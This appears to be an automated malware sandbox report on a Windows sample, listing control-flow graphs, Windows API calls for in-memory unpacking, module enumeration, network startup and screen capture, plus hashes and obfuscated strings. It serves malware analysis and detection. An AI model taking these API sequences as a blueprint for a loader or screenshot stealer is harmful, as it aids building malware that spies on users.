                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 0 58003c-580047 1 580049 0->1 2 58004c-580263 call 580a3f call 580e0f call 580d90 VirtualAlloc 0->2 1->2 17 58028b-580292 2->17 18 580265-580289 call 580a69 2->18 20 5802a1-5802b0 17->20 21 5802ce-5803c2 VirtualProtect call 580cce call 580ce7 18->21 20->21 22 5802b2-5802cc 20->22 29 5803d1-5803e0 21->29 22->20 30 580439-5804b8 VirtualFree 29->30 31 5803e2-580437 call 580ce7 29->31 33 5804be-5804cd 30->33 34 5805f4-5805fe 30->34 31->29 38 5804d3-5804dd 33->38 35 58077f-580789 34->35 36 580604-58060d 34->36 41 58078b-5807a3 35->41 42 5807a6-5807b0 35->42 36->35 39 580613-580637 36->39 38->34 43 5804e3-580505 LoadLibraryA 38->43 48 58063e-580648 39->48 41->42 44 58086e-5808be LoadLibraryA 42->44 45 5807b6-5807cb 42->45 46 580517-580520 43->46 47 580507-580515 43->47 56 5808c7-5808f9 44->56 49 5807d2-5807d5 45->49 50 580526-580547 46->50 47->50 48->35 51 58064e-58065a 48->51 52 580824-580833 49->52 53 5807d7-5807e0 49->53 54 58054d-580550 50->54 51->35 55 580660-58066a 51->55 62 580839-58083c 52->62 57 5807e2 53->57 58 5807e4-580822 53->58 59 5805e0-5805ef 54->59 60 580556-58056b 54->60 61 58067a-580689 55->61 63 5808fb-580901 56->63 64 580902-58091d 56->64 57->52 58->49 59->38 65 58056d 60->65 66 58056f-58057a 60->66 67 58068f-5806b2 61->67 68 580750-58077a 61->68 62->44 69 58083e-580847 62->69 63->64 65->59 71 58059b-5805bb 66->71 72 58057c-580599 66->72 73 5806ef-5806fc 67->73 74 5806b4-5806ed 67->74 68->48 75 580849 69->75 76 58084b-58086c 69->76 83 5805bd-5805db 71->83 72->83 77 58074b 73->77 78 5806fe-580748 73->78 74->73 75->44 76->62 77->61 78->77 83->54
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0058024D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                • Instruction ID: 65980d1a6785b953082f1e8a8016d24d9e37f3352a0af8a557902798a7927f25
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73526B74A01229DFDBA4DF58C985BA8BBB1BF09304F1480D9E94DA7351DB30AE89DF14

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 233 60378e-6037a7 234 6037a9-6037ab 233->234 235 6037b2-6037be CreateToolhelp32Snapshot 234->235 236 6037ad 234->236 237 6037c0-6037c6 235->237 238 6037ce-6037db Module32First 235->238 236->235 237->238 243 6037c8-6037cc 237->243 239 6037e4-6037ec 238->239 240 6037dd-6037de call 60344d 238->240 244 6037e3 240->244 243->234 243->238 244->239
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006037B6
                                                                                                                                                                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 006037D6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1651009881.0000000000602000.00000040.00000020.00020000.00000000.sdmp, Offset: 00602000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_602000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3833638111-0
                                                                                                                                                                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                • Instruction ID: 5dff0cbc1e9144583d868a154a26becd755ad7a6086854f724299927ce494f1f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FAF0F6B1240720ABD7243BF5AC8CBAFB2EDAF49726F10052CF642956C0DB70ED454A65

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 246 580e0f-580e24 SetErrorMode * 2 247 580e2b-580e2c 246->247 248 580e26 246->248 248->247
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00000400,?,?,00580223,?,?), ref: 00580E19
                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00000000,?,?,00580223,?,?), ref: 00580E1E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                • Instruction ID: 98f90b11f9820096b8e3bc537218192125a566a5c7f8a1e0e22553c4d528148f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7D0123114512877D7403A94DC09BCE7F1CDF05B62F008411FB0DE9080C770994047E5

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 281 440260-440271 282 4402a5-4402a6 call 43eb40 281->282 283 440286-440298 call 441850 RtlReAllocateHeap 281->283 284 440278-44027f 281->284 285 44029a-4402a3 call 43eb20 281->285 291 4402ab-4402ae 282->291 292 4402b0-4402b2 283->292 284->282 284->283 285->292 291->292
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B9C7,00000000,00000001), ref: 00440292
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                • Opcode ID: e3ca6a36a028ff54866f16376779860b9096701dd45936173a9f18f59b7a354d
                                                                                                                                                                                                                                • Instruction ID: c7e132dbbf166c87dd4ca7ba8e526d96017081e21b1d4d371130b4eff19db060
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e3ca6a36a028ff54866f16376779860b9096701dd45936173a9f18f59b7a354d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3E02B32404310ABD2026F397C06B177674EFC6715F05087AF50156151DB38F811C5DE

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 293 40ab12-40ab5b call 441c40 * 2 WSAStartup
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • WSAStartup.WS2_32(00000202), ref: 0040AB46
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Startup
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 724789610-0
                                                                                                                                                                                                                                • Opcode ID: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
                                                                                                                                                                                                                                • Instruction ID: 8daa5b18d499817a70b2f557c0c6df6f58e6f2abf740e83111143c9212bc1643
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0AE02B7A5D5104BBF2486751FD4FC563616BB4330AB08413DFC185017BD6511426C66A

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 299 43eb40-43eb4c 300 43eb53-43eb54 299->300 301 43eb55-43eb67 call 441850 RtlFreeHeap 299->301
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?,004402AB,?,0040B9C7,00000000,00000001), ref: 0043EB60
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                                                • Opcode ID: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
                                                                                                                                                                                                                                • Instruction ID: 6306fd139b63709815d779222b474fbda691f96f30962fae2caf2063fc0eb5d0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FDD0C931445536FBC6102F28BC06BCB3B94EF497A5F0708A5F540AA075E725DC918AD8

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 304 4404b1-4404c9 GetForegroundWindow call 4421e0 306 4404ce-4404e8 304->306
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 004404BF
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ForegroundWindow
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2020703349-0
                                                                                                                                                                                                                                • Opcode ID: ac82542d7ead4e5736e61cdedea6fc5be5df443e6220e35db9291a32a896b3cb
                                                                                                                                                                                                                                • Instruction ID: 7f86c14d6ce35f706de72b94d0a04e46592ace6e5707a2a12f6891b8fa8e10aa
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac82542d7ead4e5736e61cdedea6fc5be5df443e6220e35db9291a32a896b3cb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15E0E2B9900214DBEB44CF68FC9592933B5EB8B3093040439E202C3362EA34E602CF59

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 308 43eb20-43eb37 call 441850 RtlAllocateHeap
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,00000000,?,E931068D,004089CF,6W01), ref: 0043EB30
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                • Opcode ID: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
                                                                                                                                                                                                                                • Instruction ID: faa30900258afa928b287b4fa720072893bcbdc8cd762d9751037a3417221d58
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91C04C31045120ABD5506B15EC05BC63B54DF852A5F020065B105660718660ACC2C698
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0060349E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1651009881.0000000000602000.00000040.00000020.00020000.00000000.sdmp, Offset: 00602000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_602000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                • Instruction ID: a444563d3947e0ca86d8e8bd477876e5d427e3eef385bb0893b12c7c12c59049
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09113C79A40208EFDB01DF98C985E99BBF5AF08351F058094F9489B362D771EA50DF84
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CoCreateInstance.OLE32(CDCCD3E7,00000000,00000001,?,00000000), ref: 0043BCCC
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(37C935C6), ref: 0043BD46
                                                                                                                                                                                                                                • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043BD84
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(37C935C6), ref: 0043BDE9
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(37C935C6), ref: 0043BED0
                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 0043BF3E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                                                                                                                                                                • String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
                                                                                                                                                                                                                                • API String ID: 65563702-2807872674
                                                                                                                                                                                                                                • Opcode ID: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
                                                                                                                                                                                                                                • Instruction ID: 0fa8c84a7900d0f22f2d4f21e88135ff08406c7ea1f94cba9a5970d36c475c8e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 735202726083408BD714CF68C88176BFBE1EF89314F189A2EE5D597391D778D806CB96
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CoCreateInstance.COMBASE(CDCCD3E7,00000000,00000001,?,00000000), ref: 005BBF33
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(37C935C6), ref: 005BBFAD
                                                                                                                                                                                                                                • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 005BBFEB
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(37C935C6), ref: 005BC050
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(37C935C6), ref: 005BC137
                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 005BC1A5
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                                                                                                                                                                • String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
                                                                                                                                                                                                                                • API String ID: 65563702-2807872674
                                                                                                                                                                                                                                • Opcode ID: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
                                                                                                                                                                                                                                • Instruction ID: db33d21a0f18bdee5ac1b70f756e8262dd4506a713e3188d91973e169dd565ab
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D252DE726083408BD724CF28C8917ABBFE1EF86314F188A2DE5959B391D775E806CB56
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00436989
                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000004C), ref: 00436999
                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000004D), ref: 004369A1
                                                                                                                                                                                                                                • GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
                                                                                                                                                                                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004369C1
                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 004369D0
                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004369E7
                                                                                                                                                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelect
                                                                                                                                                                                                                                • String ID: Y
                                                                                                                                                                                                                                • API String ID: 1298755333-3233089245
                                                                                                                                                                                                                                • Opcode ID: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
                                                                                                                                                                                                                                • Instruction ID: ce6842184c50d62c14bce23637ee5c5f438d7dfa952fd3edf86735d4080956a5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A81C33A158310EFD7489FB4AC49A3B7BA5FB8A352F050C3CF546D2290C73995168B2B
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 004251AA
                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 00425243
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                • String ID: +$e$+$e$%\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f$XY$]RB
                                                                                                                                                                                                                                • API String ID: 237503144-2846770461
                                                                                                                                                                                                                                • Opcode ID: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
                                                                                                                                                                                                                                • Instruction ID: b6d59b0557f70d7ec2d4011febfa6e18cf4a5b2df19338a98cc8181bc2575411
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7F1EDB4208350DFD310DF69E89166BBBE0FFC5314F54892DE5958B362E7B88906CB46
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00419CE7
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00419D24
                                                                                                                                                                                                                                  • Part of subcall function 004402C0: LdrInitializeThunk.NTDLL(0044316E,00686628,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                                                                                • String ID: ~|$H/d$SP$if$Wu$pv$tj$vt
                                                                                                                                                                                                                                • API String ID: 764372645-18079149
                                                                                                                                                                                                                                • Opcode ID: e0b58ed5ff15dc801148dc9f86a9132d6192a83ea1caeaa00bd99fa001171b69
                                                                                                                                                                                                                                • Instruction ID: c1c817f51924b2b6e01bbc71c3bfe870e6f9d21007064de5033cd7ab66586395
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e0b58ed5ff15dc801148dc9f86a9132d6192a83ea1caeaa00bd99fa001171b69
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D624770609310AFE724CB15DC9176BB7E2EFC5314F18862DF495973A1D378AC858B4A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: $@7F$(X#^$+\1R$-T,j$2E1G$4D2Z$8I>K$H/d$T`Sf$Wdz$&$$qs$uVw
                                                                                                                                                                                                                                • API String ID: 0-562939121
                                                                                                                                                                                                                                • Opcode ID: dbc9d13701a6f1f84a1fbda366b061da39485b638189b278c3f43e1cc0e4d0b6
                                                                                                                                                                                                                                • Instruction ID: c261d025133841230159ca5431fd9423a817dc7e9349410c690f11e8db15d26c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbc9d13701a6f1f84a1fbda366b061da39485b638189b278c3f43e1cc0e4d0b6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA7283B4A05269CFDB24CF55D881BDDBBB2FB46300F1181E9C5496B362DB349A86CF84
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                • String ID: ~|$H/d$SP$if$pv$tj$vt
                                                                                                                                                                                                                                • API String ID: 3664257935-182593337
                                                                                                                                                                                                                                • Opcode ID: 557abf3bdc5e1b4c31fa4c16cb7a998475db0352c266ee35ae4fbd844e0422db
                                                                                                                                                                                                                                • Instruction ID: ef12d5c410d6cdbec455c1a37f68fc6be31147f63aeaa5f5b250c9ddeffafb11
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 557abf3bdc5e1b4c31fa4c16cb7a998475db0352c266ee35ae4fbd844e0422db
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C620770609350AFEB24CB19CC85B2BBFE6FFC5314F188A2CE49597291D371AC458B96
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
